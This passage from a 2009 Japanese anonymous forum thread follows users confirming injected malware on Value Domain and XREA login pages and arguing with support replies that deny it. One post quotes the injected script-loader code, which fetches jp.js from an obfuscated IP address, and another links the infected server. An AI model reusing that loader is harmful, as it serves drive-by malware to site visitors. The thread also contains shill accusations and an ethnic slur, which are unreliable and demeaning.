457名無しさん@お腹いっぱい。:2009/07/08(水) 14:46:10 0
仮に改竄時にパスを抜かれてたとしてだ、
現時点でコード削除されていて、再発していないということは、デジロ側で抜かれたパス変更してるはず。
なんで待ってないでさっさとログインしてパス変えちゃえば心配ないと考える。
むしろ何かされるの待ってる方がマゾ。
458名無しさん@お腹いっぱい。:2009/07/08(水) 14:49:38 0
>>456
スレ全部読んだけど、上でも誰かいってたけど原爆ネタと同じ流れじゃん
魚拓も含めて。
459名無しさん@お腹いっぱい。:2009/07/08(水) 14:50:18 0
前にxreaで運営しているネトゲサイトだかなんだかにスクリプト埋め込まれたのも同じ方法じゃないか?

あんときは http://1039045744:88/jp.js だったけど

xreaはこんときスクリプトの脆弱性をついたXSSって発表してるから今回もそうかね?
だとしたら間抜け以外の何モンでもないな

ttp://sb.xrea.com/showthread.php?p=84465
460名無しさん@お腹いっぱい。:2009/07/08(水) 14:51:01 0
ミスリードにも程がある
461名無しさん@お腹いっぱい。:2009/07/08(水) 14:52:00 0
コンタクトフォームで聞いたが、

--------------------------------------------------------------------
お世話になっております。

お問い合わせについてですが、先ほど問題無くログイン可能でございました。

セキュリティソフトなどの警告も無く、現状ではユーザー様から連絡いただいた症状を確認できませんでした。

ご確認の上、適宜ご作業いただければ幸いです。
---------------------------------------------------------------------

「現状ではユーザー様から連絡いただいた症状を確認できませんでした。」
と言う言葉を信じるなら、ガゼじゃないのか?
妬みを持つユーザーから
462名無しさん@お腹いっぱい。:2009/07/08(水) 14:54:48 0
godaddyは以前クラックされてたよな。
FC2は安いしVDに近い操作ができそうだが、実際どうなのかな
463名無しさん@お腹いっぱい。:2009/07/08(水) 14:58:21 0
こんな時に何だけど、ネームサーバ障害はやっぱり完全放置なんだよね?
464460:2009/07/08(水) 15:01:29 0
サポートに質問してみたら速攻レスきて驚いた・・・

[2009-07-08 14:51:02] サポートからメッセージが追加されました。

お世話になっております。

お問い合わせについてですが、弊社にてサポート業務などにおいて数分単位でログインページは常時確認しております
が、ユーザー様よりご連絡いただいている「改竄」は確認できませんでした。

ご確認の上、適宜ご作業いただければ幸いです。

2ちゃんを信じるか公式のコメントを信じる最終的には個々の判断だけど
もし事実じゃないとしたら、いくら2ちゃんねるだからといって悪質にも程があると思う。
ミスリードに釣られて煽った人間も同罪。
465名無しさん@お腹いっぱい。:2009/07/08(水) 15:02:35 0
魚拓はどうなの
怖くてみれない
466名無しさん@お腹いっぱい。:2009/07/08(水) 15:04:54 0
>>465
スレの内容どおりだよ、マルウェアが仕込まれたjsファイルへのリンクが埋め込まれてる
ブラウザのjavascriptを切った状態でアクセスしてソースを確認すればいい
467名無しさん@お腹いっぱい。:2009/07/08(水) 15:08:26 0
やはり、改竄はなかった。サポートが正式回答しているではないか。
他社工作員乙。捏造するにも程がある。いい加減にしろ。
468名無しさん@お腹いっぱい。:2009/07/08(水) 15:13:06 0
firefox+Noscriptで魚拓見てきたけど
たしかにあったねs.jsっていうの
この魚拓URL見せたらなんて言うんだろう?
469名無しさん@お腹いっぱい。:2009/07/08(水) 15:14:02 0
ソースのログインフォームの下あたりだよね
470名無しさん@お腹いっぱい。:2009/07/08(水) 15:16:09 0
魚拓が捏造でしょ
デジロが正式アナウンスしない限り、他社工作員の捏造
471名無しさん@お腹いっぱい。:2009/07/08(水) 15:19:40 0
改ざんされて被害にあったっていってたひとがふしあなで書き込むといいんじゃない?
472名無しさん@お腹いっぱい。:2009/07/08(水) 15:20:31 0
捏造って流れで押そう! ってのがトレンドなんだw
473名無しさん@お腹いっぱい。:2009/07/08(水) 15:21:27 0
ホメ殺しでしょ、極端なデジロ擁護で逆に反感を煽ってるんだよ
474名無しさん@お腹いっぱい。:2009/07/08(水) 15:23:52 0
ははww
前スレ終盤あたりからだよねその流れww
475名無しさん@お腹いっぱい。:2009/07/08(水) 15:23:53 0
極端なデジロ擁護っていうのがよくわからない
476名無しさん@お腹いっぱい。:2009/07/08(水) 15:23:58 0
魚拓が捏造可能って話にしちゃうとそれはそれですごい面倒な話になる気がする
477名無しさん@お腹いっぱい。:2009/07/08(水) 15:27:07 0
社員乙っていわれるようにレスしてんじゃないの
原爆の時みんなにスルーされてたやつじゃない?
478名無しさん@お腹いっぱい。:2009/07/08(水) 15:27:35 0
魚拓がねつ造可能だと通報しろ。そっちの方が世間的には盛り上がるぞw
479名無しさん@お腹いっぱい。:2009/07/08(水) 15:28:59 P
>>462
FC2は複数のドメイン管理で切り替えが必要な時点でクソ。
個人的にはムームーの方がよっぽど使いやすいレベル。
480名無しさん@お腹いっぱい。:2009/07/08(水) 15:29:19 P
おれ、リアルタイムで人柱やった。当時、その追加されてるソースも確認した。
で、>>464の報告が事実だと仮定して、サポートが「確認できなかった」のが本当ならば、
仕掛けた本人が消したか、もしくはデジロックの担当部署が当該ソースを削除して、
サポートにその申し送りがされてないとしか考えられない。

とことん「改竄がなかった」ことにしたい輩がいるけれど、
俺から見れば、むしろそうやってうやむやにしたい奴のほうが悪質に見える。

>>473
その可能性はあるね。頭がおかしいとしか言いようがない。
481名無しさん@お腹いっぱい。:2009/07/08(水) 15:33:49 0
自分で確認できなかった事と事実をなかったことにしろっていうのは違うだろ。
公式がないって言ってんのを名無しを信じろっていうほうが無理だろ
482名無しさん@お腹いっぱい。:2009/07/08(水) 15:34:15 0
なかったことにしたい人が必死すぎてこわい
483名無しさん@お腹いっぱい。:2009/07/08(水) 15:34:58 0
俺から見れば名無しで書き込んで、信じろっていうやつのほうが頭おかしいと思うが
484名無しさん@お腹いっぱい。:2009/07/08(水) 15:35:42 0
>>480
お金を取って、ログまで残して回答してるのと、
2chのどっちを信るかろと言えば、前者だろ。

ちょっと考えれば、value-domainってlocalアドレスを
自分のPCで書き換えれば、URI付き魚拓なんて捏造いくらでもできるからな。

絶対ガセ
485名無しさん@お腹いっぱい。:2009/07/08(水) 15:35:51 0
>>482
頭大丈夫?
486名無しさん@お腹いっぱい。:2009/07/08(水) 15:36:06 0
名無しの問題じゃなくて、魚拓の信頼性だろ
487名無しさん@お腹いっぱい。:2009/07/08(水) 15:36:48 0
どうせわざとやってんだから相手にすんなよ
488名無しさん@お腹いっぱい。:2009/07/08(水) 15:38:47 P
>>481
そんなこと言うなら、
「公式がないって言ってる」という情報源だって名無しだろうが
489名無しさん@お腹いっぱい。:2009/07/08(水) 15:40:23 0
急にP付で書き込んでてフイタw
恥を知れw
490名無しさん@お腹いっぱい。:2009/07/08(水) 15:42:04 0
>>484
それ自分はだませるけど魚拓側のリゾルバはだませないだろ?
491名無しさん@お腹いっぱい。:2009/07/08(水) 15:43:50 0
ガセを流した方々へ

コンタクトフォームで問い合わせしてるやしまで現れて、
デジロックは無駄な労力使ってる。

そろそろ許してやれよなーー
492名無しさん@お腹いっぱい。:2009/07/08(水) 15:44:45 0
ActiveX…恐ろしい子っ!
493名無しさん@お腹いっぱい。:2009/07/08(水) 15:44:54 0
>>490
localhost value-domain.com

でいいんでない?
494名無しさん@お腹いっぱい。:2009/07/08(水) 15:45:39 P
>>481
まあいいや。
君が善意の第三者と仮定するなら、君の言い分も分からないではない。
ただソースをこの目で確認した俺からすれば、隠蔽工作をしているデジロックに
対して心底腹が立つ。

てか俺、完璧釣られてるのかな。
495名無しさん@お腹いっぱい。:2009/07/08(水) 15:46:24 0
>>493
魚拓のコンテンツ取得って魚拓のサーバーがやってるんだから
ローカルのホスト情報関係ないと思ったんだけどそういう仕組みじゃないんだっけ?
496名無しさん@お腹いっぱい。:2009/07/08(水) 15:46:29 0
>>493
魚拓サイトのサーバにそれをどうやって書き込むの?
自分のPCだけだよそれで騙せるのは
497名無しさん@お腹いっぱい。:2009/07/08(水) 15:48:00 0
魚拓というアーカイバーか。なるほど。
498名無しさん@お腹いっぱい。:2009/07/08(水) 15:48:17 0
被害にあったっていうならふしあなで書き込めばいいんじゃない?
そうすれば擁護の連中も信じるかもよ?

>おれ、リアルタイムで人柱やった。当時、その追加されてるソースも確認した。
>で、>>464の報告が事実だと仮定して、サポートが「確認できなかった」のが本当ならば、
>仕掛けた本人が消したか、もしくはデジロックの担当部署が当該ソースを削除して、
>サポートにその申し送りがされてないとしか考えられない。
499名無しさん@お腹いっぱい。:2009/07/08(水) 15:48:27 0
>>494
ええ、釣られてると思いますよ
500名無しさん@お腹いっぱい。:2009/07/08(水) 15:49:08 0
>>494
ヒント:現在勤務時間中
501名無しさん@お腹いっぱい。:2009/07/08(水) 15:50:05 0
ID出れば社員がわかって便利なのに不便だな
502名無しさん@お腹いっぱい。:2009/07/08(水) 15:52:13 0
お待ちかねの社員乙のタイミングですねw
わざわざご苦労さま
503名無しさん@お腹いっぱい。:2009/07/08(水) 15:53:08 0
ガセ情報を流しているのは社員の方ですね
504名無しさん@お腹いっぱい。:2009/07/08(水) 15:53:16 P
>>499-500
だよねぇ・・・。

>>498
べつにやってもいいけど、何の根拠にもならんだろ。
相手が善意の第三者でないなら尚更のこと。
505名無しさん@お腹いっぱい。:2009/07/08(水) 15:55:31 0
意味がわからない・・・
506名無しさん@お腹いっぱい。:2009/07/08(水) 15:57:04 P
いっそまちBBSとか、全員強制IPのところでやれば面白い。
507名無しさん@お腹いっぱい。:2009/07/08(水) 15:57:37 O
まぁ、そのうちにドメイン乗っ取りが開始されれば、少しはここも静かになるわな。
508名無しさん@お腹いっぱい。:2009/07/08(水) 15:57:52 0
WEB魚拓の中の人に連絡してみる
どっちかが捏造してるんだろ?それは罪を問われるべき
509508:2009/07/08(水) 16:00:36 0
デジロの捏造だとしたら救いようない問題だし
WEB魚拓経由で捏造してウィルス撒いてるとしても問題
これは白黒つけるべき
510名無しさん@お腹いっぱい。:2009/07/08(水) 16:01:34 0
ややこしくなるからお前もうでてくんなよ
511名無しさん@お腹いっぱい。:2009/07/08(水) 16:01:49 P
あ、関係ないかもしれないけど、
今XREAのアクセスアナライザー ttp://ax.xrea.com/
のログイン画面で、アバスト反応した。
↓こんなんみたいだけど。
JS:CVE-2008-0015-A [Expl]
これって今回の騒動は関係ない?

512名無しさん@お腹いっぱい。:2009/07/08(水) 16:03:09 0
>>511
ある! 同じjsが
513名無しさん@お腹いっぱい。:2009/07/08(水) 16:04:14 0
うわ!マジで居る
見に行くならスクリプト切っていけよ
514名無しさん@お腹いっぱい。:2009/07/08(水) 16:04:42 0
>>511

</head>タグのちょうどうえ

<SCRIPT LANGUAGE="JAVASCRIPT">
var js = document.createElement('script');
js.src ="http://1856317799:888/jp.js";
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;
</SCRIPT>
</HEAD>
515511:2009/07/08(水) 16:06:11 P
どうも。アバスト反応して、入る前にすぐ削除したけどびっくりしたわ。>>511
昨日の昼ぐらいまでは、こんなん反応しなかったハズ。
516511:2009/07/08(水) 16:08:03 P
今もうPCの電源落としてアドエスからP2経由でレスしてるんで、
魚拓等必要あれば誰かたのんますー。
517名無しさん@お腹いっぱい。:2009/07/08(水) 16:08:07 O
デジロ社員はこんなとこで遊んでないで…

とっととデジロウイルスの対策をしろよ
518名無しさん@お腹いっぱい。:2009/07/08(水) 16:09:17 0
login.phpにあるの?今ソース確認中
519名無しさん@お腹いっぱい。:2009/07/08(水) 16:09:26 0
IE使ってる人は要注意だなこりゃ
520名無しさん@お腹いっぱい。:2009/07/08(水) 16:10:11 0
>>518
違う、>>511 をよく読め
521名無しさん@お腹いっぱい。:2009/07/08(水) 16:10:15 0
この人病気なんかな・・・
522名無しさん@お腹いっぱい。:2009/07/08(水) 16:10:57 0
value-domainの方は大丈夫だねさすがに
523名無しさん@お腹いっぱい。:2009/07/08(水) 16:12:05 0
ログイン画面じゃなくてトップページじゃない?
524名無しさん@お腹いっぱい。:2009/07/08(水) 16:12:58 0
なくなった…
525名無しさん@お腹いっぱい。:2009/07/08(水) 16:13:36 0
トップページとログイン画面のソース見たけど
>>514に書かれてるやつなかったよ。別のページなのかな
526名無しさん@お腹いっぱい。:2009/07/08(水) 16:14:11 0
たしかに貼られた直後見に行ったけど無かった
すでに消されてたのか?
527名無しさん@お腹いっぱい。:2009/07/08(水) 16:14:16 0
まだ残ってるよ
いい加減なこと言うな
528名無しさん@お腹いっぱい。:2009/07/08(水) 16:14:24 0
>>525
いやもうない
529名無しさん@お腹いっぱい。:2009/07/08(水) 16:14:33 0
おいwふざけるのもいい加減にしろw
>>511みてすぐ行ったけど確認できなかったぞ!
釣られた俺が恥ずかしいだろうがあああああああああああああああ!www
530名無しさん@お腹いっぱい。:2009/07/08(水) 16:15:53 0
自分も見つからなかったが、>>511が書き込まれた直後に対策されたか?
ソースチェッカーオンラインでは16:11にチェックされたキャッシュが残っていて、そこでは不正コードが確認できる
ttp://so.7walker.net/?site=http%3A%2F%2Fax.xrea.com%2Flogin.php&hua=

(魚拓と違っていつまでこの不正コード入りキャッシュが残ってるかは不明
531名無しさん@お腹いっぱい。:2009/07/08(水) 16:15:55 0
ある。ほぼ同じコードが入っている。jp.js
532名無しさん@お腹いっぱい。:2009/07/08(水) 16:17:36 0
>>530のソースは確かに確認できた。
けどやはりアクセス解析の方はもう無いみたいだよ。
533名無しさん@お腹いっぱい。:2009/07/08(水) 16:18:10 0
リアルタイムで改竄されてるの?
534名無しさん@お腹いっぱい。:2009/07/08(水) 16:18:24 0
たった今消えたな
なんかついたり消えたりしてる?
535名無しさん@お腹いっぱい。:2009/07/08(水) 16:18:30 0
いやはやなんともw
釣りじゃなくて本当にあったんだがもうなくなってるわ、少なくとも俺は確認できない

自分で見なきゃ信じられんのは俺も同じだから罵倒されてもしょうがないけど
やべぇ、ウィルスとかそんな問題より現状が面白くてしょうがないw
536529:2009/07/08(水) 16:18:54 0
わろたwwwなんだこいつw
537154:2009/07/08(水) 16:18:55 0
問い合わせてから2営業日経とうとしているがその後の回答が全く無い
ガセならガセでいいんだが、「改竄の事実はございません」の公式アナウンスがなぜできない!
技術に自信がないのか?ブランド信用力の低下が怖いのか?(今さら!)

VDとは6年近い付き合いだけど、今さっき全ドメイン移管手続きを執ったよ。。。

今回の件だけはVDのトップページで公式にアナウンスして欲しかった。
改竄の事実が無いなら「無い」と堂々と宣言できないVDには愛想が尽きたよ。
538名無しさん@お腹いっぱい。:2009/07/08(水) 16:19:56 0
念のため全ページのソース見てきた。
今のとこはコード入ってないようだ。
539名無しさん@お腹いっぱい。:2009/07/08(水) 16:20:23 0
16:17 の時点に wget で確認したけど、確かに混入してるね。
バランサで混入ありソースとなしソースが流れてるんじゃね?
540名無しさん@お腹いっぱい。:2009/07/08(水) 16:20:25 0
魚拓のURLをよく見ろスキームはhttpsだ。
これがねつ造であるなら、SSLでなりすましが可能である事を示してる。
541名無しさん@お腹いっぱい。:2009/07/08(水) 16:20:42 0
>>511
おもいっきり仕込まれてる。ソースで言うと62〜68行目。
64行目に 1856317799:888/jp.js がある。
542名無しさん@お腹いっぱい。:2009/07/08(水) 16:20:55 0
デジロック関連はしばらくスクリプト切ってアクセスしたほうがいいんじゃねえか
543名無しさん@お腹いっぱい。:2009/07/08(水) 16:21:29 0
消えた。攻撃者がここ見ててひっこめたとかだと嫌だな。
544名無しさん@お腹いっぱい。:2009/07/08(水) 16:22:23 0
それだと上げてるやつが一番怪しく思えるぞw
まーそんなことはないでしょ
545539:2009/07/08(水) 16:23:13 0
こいつぜってー頭狂ってるw
546名無しさん@お腹いっぱい。:2009/07/08(水) 16:23:14 0
ax.xrea.comは全部のページやられてるなw
547名無しさん@お腹いっぱい。:2009/07/08(水) 16:23:31 0
>>539
うわ、まじだ

>Name: ax.xrea.com
>Addresses: 219.101.229.188, 219.101.229.189
前者に不正コード確認、後者はなし

ttp://219.101.229.188/login.php (現時点で不正コード注意)
548名無しさん@お腹いっぱい。:2009/07/08(水) 16:24:07 0
この板に社員が常駐して、問題があるたびに直しているとしか思えないな
549名無しさん@お腹いっぱい。:2009/07/08(水) 16:24:22 0
魚拓がちょうど今メンテナンス中で取れないんだよなぁ

何が起こっているのかだけでも早く知りたいよ
アナウンスしろよVD
550名無しさん@お腹いっぱい。:2009/07/08(水) 16:24:44 0
>>539が正解じゃないか?
551名無しさん@お腹いっぱい。:2009/07/08(水) 16:24:48 0
>>539
ax.xrea.comは2台だな。
219.101.229.188 ←やられてる
219.101.229.189 ←やられてない
552名無しさん@お腹いっぱい。:2009/07/08(水) 16:25:17 0
さっきからコードないないって書き込んでる奴だけど
>>547のURLでなら確認できた。
553名無しさん@お腹いっぱい。:2009/07/08(水) 16:25:25 0
>>548
それはそれで対応してくれてるなら助かるけどさ
再アップロードしてはい直しました!って話だったらトルチョックかましたくなる
554名無しさん@お腹いっぱい。:2009/07/08(水) 16:26:01 0
とりあえず、何度か取得してみたけど、あり・なしが落ちてくるね。

ありindex.html:11818 byte で CR+LF
なしindex.html:11310 byte で LF

diff は改行コード以外は 62〜68 行目の SCRIPT だけだね。
555名無しさん@お腹いっぱい。:2009/07/08(水) 16:26:11 0
>>547
専ブラで飛んじゃうような貼り方するなよ…
556名無しさん@お腹いっぱい。:2009/07/08(水) 16:27:20 0
魚拓のメンテ終わるのと不正コード除去とどっちがはやいかな

>>555
すまん、以後http全部抜くわ
557名無しさん@お腹いっぱい。:2009/07/08(水) 16:28:38 0
アクセス解析タグに仕込むことも出来るんじゃと思ったら
ぞっとした
558名無しさん@お腹いっぱい。:2009/07/08(水) 16:28:40 0
ひょっすると社員も確認する術がなくて、ガセなんじゃ・・・とか思ってるのかもなww

たぶん、リアルタイムに罠貼ったり外したりしてるw
俺は、7月5日の夜中にwikiwiki.jpの方でトロイphp仕込まれてるのみたけど、
5分後には、なくなってたりとか、管理人が削除したにしては、やけに対応が早いなとは思った。
559名無しさん@お腹いっぱい。:2009/07/08(水) 16:29:50 0
踏んできた。一発でヒット http://www1.axfc.net/uploader/He/so/233661.png dlkey: dxvwvd
560名無しさん@お腹いっぱい。:2009/07/08(水) 16:30:13 0
バレる前に削除して、定期的にパスを抜いてんだろうな
よくよく考えるとかなり深刻じゃないか?
561名無しさん@お腹いっぱい。:2009/07/08(水) 16:31:09 0
>>445
「個人情報の取り扱いについて」で
>ユーザー登録時に申請された情報は一切公開されません。当データベースサーバー内に保存され、厳重に保管されます。
>自動課金等のオプションをお客様が選択される場合、クレジットカード情報が当サーバーに保存されます。それらの情報は当データベースサーバー内で暗号化・保存され、厳重に保管されます。
とはあるけど、果たして罰せられるのかねえ

「責任の限界について」で>>141に加えて
>あらゆるユーザーデータの操作処理
もあると思ったけど、不正アクセスは操作処理ではなく通常の管理だから違うのか

>あらゆる非常事態が発生したことによる損失
今回のことが非常事態といえるのか
>あらゆる原因によって起こるドメインネーム登録の未完了、不可、損失
あらゆる原因に法的例外とかはないのか

とここまで考えて思ったんだけど。。。
562名無しさん@お腹いっぱい。:2009/07/08(水) 16:32:03 0
責任の限界もなにも通常業務レベルでセキュリティ対策は必須事項っすよ
563名無しさん@お腹いっぱい。:2009/07/08(水) 16:33:32 0
でも不正コード削除してもログは残るんじゃないの?
内部の人が書き換えてるじゃなければ、分かりそうなもんだよね?
564名無しさん@お腹いっぱい。:2009/07/08(水) 16:33:38 0
これやばいだろ…
565名無しさん@お腹いっぱい。:2009/07/08(水) 16:35:14 0
ここのアクセス解析使ってるとこたくさん見るから
やばいんじゃないかな…さすがに。
566名無しさん@お腹いっぱい。:2009/07/08(水) 16:35:50 P
>>561
法律家じゃないから根拠法とかわからんけど、消費者保護の観点から消費者に著しく不利な契約は無効とかじゃなかった?
果たすべき管理責任を果たさないことにより利用者が損害を受けた場合は当然賠償責任が発生すると思うけど。
567名無しさん@お腹いっぱい。:2009/07/08(水) 16:36:01 0
value-domainならまだ利用者数はそれほどでもないだろうけど
xreaとなると話はだいぶ違ってくるね
568名無しさん@お腹いっぱい。:2009/07/08(水) 16:36:17 0
魚拓が改鼠されているとかいうとんでも理論をデジロックが発表するのに期待・・・
と思ったらxreaにも仕込まれてたか、どうみてもデジロックやられてるだろw
569名無しさん@お腹いっぱい。:2009/07/08(水) 16:36:43 P
アクセス解析のサーバーとバリュドメのサーバーは別だよね。
デジロ関係が軒並み侵入されてるってこと?

>>563
同意。
570名無しさん@お腹いっぱい。:2009/07/08(水) 16:37:31 0
いつ改竄されたのかヘッダ見ようと思ったらこれ動的に生成してるのね。
>>554 index.htmlは存在しない。index.php。
このサーバのPHPの出力に全部くっついてくる気がする。
571名無しさん@お腹いっぱい。:2009/07/08(水) 16:39:10 0
>>570
あぁ、すまん。そういやそうだね。
572名無しさん@お腹いっぱい。:2009/07/08(水) 16:39:13 0
こうなると次はXREAかCOREのadmin.cgiにも仕組まれるのかな

jsの中身見たら不正コードに混じって忍者TOOLS提供の
アクセスカウンタのコードが入っていて憎たらしいと思った
573名無しさん@お腹いっぱい。:2009/07/08(水) 16:39:49 0
いつものコピペの事務員レベルじゃ状況把握出来てないっぽいな。終わってる。
すべてのphpスクリプトの安全宣言出るまで使えないでしょ。
574名無しさん@お腹いっぱい。:2009/07/08(水) 16:42:05 0
規約の法的拘束力って限界あるよね

電子商取引等に関する準則
?目次? 第1.オンライン取引_
5(3) なりすましを生じた場合の認証機関の責任
http://74.125.155.132/search?q=cache:_khHgPhY4rcJ:www.meti.go.jp/topic/downloadfiles/e2032
575名無しさん@お腹いっぱい。:2009/07/08(水) 16:42:19 0
>セキュリティベンダーなどの公開情報によれば、この脆弱性を悪用した攻撃コードは既に広範囲に仕掛けられた形跡があり、日本のサイトも含まれるという。
http://internet.watch.impress.co.jp/docs/special/20090708_300654.html

今回の事と関係なし?
576名無しさん@お腹いっぱい。:2009/07/08(水) 16:42:23 0
こんなに自在に書き換えできるんなら、よっぽど管理者を馬鹿にしてないかぎり、足跡消すはず

で、公式発表は、改ざんはないんだっけ? どうなの、これ
577名無しさん@お腹いっぱい。:2009/07/08(水) 16:42:56 P
XREAとかにFTPのログインしても大丈夫なんだろうか
578名無しさん@お腹いっぱい。:2009/07/08(水) 16:43:19 0
忍者のアクセスカウンタだと…?
579名無しさん@お腹いっぱい。:2009/07/08(水) 16:43:35 0
>>575
いやそのものずばりだよ。
580名無しさん@お腹いっぱい。:2009/07/08(水) 16:43:40 0
お問い合わせについてですが、弊社にてサポート業務などにおいて数分単位でログインページは常時確認しております
が、ユーザー様よりご連絡いただいている「改竄」は確認できませんでした。
581名無しさん@お腹いっぱい。:2009/07/08(水) 16:44:03 0
今回のはjpgに仕組まれてるのが怖いな
582名無しさん@お腹いっぱい。:2009/07/08(水) 16:44:26 0
gifとswfにも入ってるよ
583名無しさん@お腹いっぱい。:2009/07/08(水) 16:45:19 0
VALUE DOMAIN サービス利用規約には
準拠法、管轄裁判について
当規約には日本法が適用されます。また、当規約、当サービスに関わる一切の紛争は、大阪地方裁判所の専属管轄とします。
とある
大阪地裁だから
Yahoo! BB顧客情報漏洩事件
http://ja.wikipedia.org/wiki/Yahoo!_BB%E9%A1%A7%E5%AE%A2%E6%83%85%E5%A0%B1%E6%BC%8F%E6%B4%A9%E4%BA%8B%E4%BB%B6
584名無しさん@お腹いっぱい。:2009/07/08(水) 16:47:00 0
>>579
サンクス そのものずばりですか・・・
585名無しさん@お腹いっぱい。:2009/07/08(水) 16:48:24 0
>>578
いじり中ですかw
pdfとswfとmsvidctlスクリプト、および降ってくるexeについては
ベンダーにも送ってあるしセキュ板にもアップしてあります。
586名無しさん@お腹いっぱい。:2009/07/08(水) 16:50:01 0
降ってくるexe、一応カスペルスキーだと処理してくれるね
他は知らんけど
587名無しさん@お腹いっぱい。:2009/07/08(水) 16:50:56 0
>>575
先月からIEから火狐に乗り換えておいてよかった…本当によかった…
588名無しさん@お腹いっぱい。:2009/07/08(水) 16:52:11 0
>>265で報告したのに
589名無しさん@お腹いっぱい。:2009/07/08(水) 16:53:31 0
改ざんがないってことは、自分でやってんじゃね?
590名無しさん@お腹いっぱい。:2009/07/08(水) 16:57:15 0
社員のいたずらだったりしてw
591名無しさん@お腹いっぱい。:2009/07/08(水) 16:57:28 0
2ちゃんねるの情報なんて参考にならない
すべて捏造で壮大な釣りかもしれない
592名無しさん@お腹いっぱい。:2009/07/08(水) 16:59:28 0
>>591
2chでも嘘を書けば逮捕されるのでそれはない
593名無しさん@お腹いっぱい。:2009/07/08(水) 16:59:39 0
ユーザー様よりご連絡いただいている「改竄」は確認できませんでした。
594名無しさん@お腹いっぱい。:2009/07/08(水) 17:01:01 0
魚拓って改ざんされないの?
595名無しさん@お腹いっぱい。:2009/07/08(水) 17:01:53 0
596名無しさん@お腹いっぱい。:2009/07/08(水) 17:02:57 0
このスレは以下の五大勢力で構成されています

混乱させようと、改竄はないと嘘を言ってるヤツ:1人(>>580とかそのへん)
改竄を目の当たりにしたヤツ:数人
怖くて確認できないけど心配してるヤツ:多数
リアルタイムで弄ぶ改竄クラッカー:1人
デジロ工作員:数人
597名無しさん@お腹いっぱい。:2009/07/08(水) 17:03:47 0
>>596
お前はどれ?
598名無しさん@お腹いっぱい。:2009/07/08(水) 17:04:51 0
降ってくるexeって何?
599名無しさん@お腹いっぱい。:2009/07/08(水) 17:04:55 0
俺はガンダムだ
600名無しさん@お腹いっぱい。:2009/07/08(水) 17:05:02 0
改竄を目の当たりにしたヤツじゃないと信じられない流れだろ
601名無しさん@お腹いっぱい。:2009/07/08(水) 17:05:07 0
>>597
俺はlogin.phpの改竄を目の当たりにした人間
602名無しさん@お腹いっぱい。:2009/07/08(水) 17:05:59 0
アクアナは現時点で確認できるでしょ?>>600
603名無しさん@お腹いっぱい。:2009/07/08(水) 17:07:07 0
>>602
いや俺は一番浮かれてたバカだよ、書き込み後に真っ先に見た
604名無しさん@お腹いっぱい。:2009/07/08(水) 17:07:46 0
5月末からのネームサーバ大障害の放置も捏造でプッシュするのかな?
605名無しさん@お腹いっぱい。:2009/07/08(水) 17:07:51 0
jsをオフにして、アクロバットリーダーとフラッシュプレイヤーを最新にして、
fix itとか言う奴をやっとけば大丈夫?
606名無しさん@お腹いっぱい。:2009/07/08(水) 17:08:20 0
>>598
exeがPCにいつのまにかDLされてくる
何も表示ないし、隠しフォルダにはいってくるからレジストリみてないとわからんかもしれんけど
普通はセキュリティソフトが防ぐから、ノーセキュリティのときのみだが
607名無しさん@お腹いっぱい。:2009/07/08(水) 17:08:36 0
VDもアレだが、そもそもVD狙って改竄してる奴は誰なんだ?
608名無しさん@お腹いっぱい。:2009/07/08(水) 17:09:53 0
>>606
ありがとう。

昨日アクアナにカスペが反応したときはビビッた。
609名無しさん@お腹いっぱい。:2009/07/08(水) 17:09:57 0
こうなってくると去年の改竄さわぎもデジロの説明じゃ納得できんな
スクリプトの脆弱性なのか、それともサーバの脆弱性なのか
サーバの脆弱性だったらレンサバの方も危ない
610名無しさん@お腹いっぱい。:2009/07/08(水) 17:10:09 0
exeはキーロガーっぽいけど
ログインパスだけじゃないよな。どこまで狙ってるんだろ
611名無しさん@お腹いっぱい。:2009/07/08(水) 17:10:57 0
結局1年経っても何の対応もしてないよな。
612名無しさん@お腹いっぱい。:2009/07/08(水) 17:11:10 0
アクアナ関連はxrea絡みだからxreaスレでやれば?
2スレが噴いた方が捏造煽りの子も喜ぶんじゃね?
613名無しさん@お腹いっぱい。:2009/07/08(水) 17:12:04 0
アクアナは専用スレがあったはず
614名無しさん@お腹いっぱい。:2009/07/08(水) 17:13:24 0
>>613
【アクセス解析】AccessAnalyzer.com Part5【XREA】
http://pc11.2ch.net/test/read.cgi/hp/1234096306/
615名無しさん@お腹いっぱい。:2009/07/08(水) 17:13:58 0
本来はサポートフォーラムでやった方がいいんだけどね
616名無しさん@お腹いっぱい。:2009/07/08(水) 17:14:18 0
login.php のソース読んだ限りぜんぜん問題なさそうだが?
js自体ほとんど使ってないし
なにが問題なんだ?
617名無しさん@お腹いっぱい。:2009/07/08(水) 17:14:57 0
ブラウザからダウンロードするのって、かならずダウンロード前にウィンドウが出たり、上のバーがでるもんだと思ってた
セキュリティホールつくと本当になにも表示されないんだな、気がついたらDLされてて驚いた
勉強になったわ
618名無しさん@お腹いっぱい。:2009/07/08(水) 17:14:58 0
あんまり情報が分散すると、見るのがたいへんというのもあるんだよね。
619名無しさん@お腹いっぱい。:2009/07/08(水) 17:15:10 0
ソースを読めても日本語読めないのかよ
620名無しさん@お腹いっぱい。:2009/07/08(水) 17:15:24 0
実質的にここがデジロック総合スレだと思ってたわ
621名無しさん@お腹いっぱい。:2009/07/08(水) 17:16:04 0
>>614
2分でスレ拾ってくるとは仕事が速いねw

いや、前から知ってるけどそれ製作板だよね?
xrea系列のサービスなんだからxreaスレでやりゃいいじゃん。
その方がいつもの捏造煽りの子も同板内で2ヶ所同時にスレ噴いて楽しめるから良いかなと。
622名無しさん@お腹いっぱい。:2009/07/08(水) 17:16:05 0
>>617
降ってくるexe?
どこにダウンロードされるの?
ファイル名教えて。
623名無しさん@お腹いっぱい。:2009/07/08(水) 17:16:24 0
問題のところr開いて、ソース見たけど、中身が何もない
でもexeはDLされて、カスペルスキーが反応する。これどういう技術? 怖いんだけど
624名無しさん@お腹いっぱい。:2009/07/08(水) 17:18:08 0
IE使ってないけどなんかこわいからFix itしてきた
625名無しさん@お腹いっぱい。:2009/07/08(水) 17:18:10 0
>>621
その趣旨なら、複数の板で騒いだ方がいいんじゃね?
でも、オレは分散するとめんどくさい派
626名無しさん@お腹いっぱい。:2009/07/08(水) 17:19:27 0
カスペルスキーとアバストの報告はあるし、ノートンは対応してるらしいよね、告知では。

ウイルスバスターはどう?
627名無しさん@お腹いっぱい。:2009/07/08(水) 17:20:46 0
>>625
だな。
先に行って待ってりゃデジロ社員共々やって来るだろうからそうするわ。
628名無しさん@お腹いっぱい。:2009/07/08(水) 17:21:56 0
>>607
保守管理しているシナ人じゃねぇの、前回と同じ集団
629名無しさん@お腹いっぱい。:2009/07/08(水) 17:22:24 0
js切ってると不便だね。
